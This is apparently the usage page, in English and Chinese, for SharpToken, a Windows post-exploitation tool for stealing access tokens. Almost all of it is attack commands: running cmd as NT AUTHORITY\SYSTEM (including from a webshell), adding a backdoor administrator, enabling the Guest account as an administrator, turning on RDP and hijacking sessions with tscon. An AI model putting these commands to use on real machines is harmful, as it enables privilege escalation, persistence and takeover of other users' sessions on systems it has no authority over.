.NET版本的incognito
Usage
SharpToken By BeichenDream
=========================================================
Github : https://github.com/BeichenDream/SharpToken
Usage:
SharpToken COMMAND arguments
COMMANDS:
list_token [process pid]
list_all_token [process pid]
add_user <username> <password> [group] [domain]
enableUser <username> <NewPassword> [NewGroup]
delete_user <username> [domain]
execute <tokenUser> <commandLine> [Interactive]
enableRDP
tscon <targetSessionId> [sourceSessionId]
example:
SharpToken list_token
SharpToken list_token 6543
SharpToken add_user admin Abcd1234! Administrators
SharpToken enableUser Guest Abcd1234! Administrators
SharpToken delete_user admin
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
SharpToken execute "NT AUTHORITY\SYSTEM" cmd true
SharpToken tscon 1
枚举Token
枚举的信息包括SID,LogonDomain,UserName,Session,LogonType,TokenType,TokenHandle(Duplicate后的Token句柄),TargetProcessId(Token来源的进程),TargetProcessToken(Token在源进程的句柄),Groups(Token用户所在组)
从指定进程枚举Token
SharpToken list_token 468
获得交互式shell
execute "NT AUTHORITY\SYSTEM" cmd true
获取命令执行结果(webshell下执行)
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
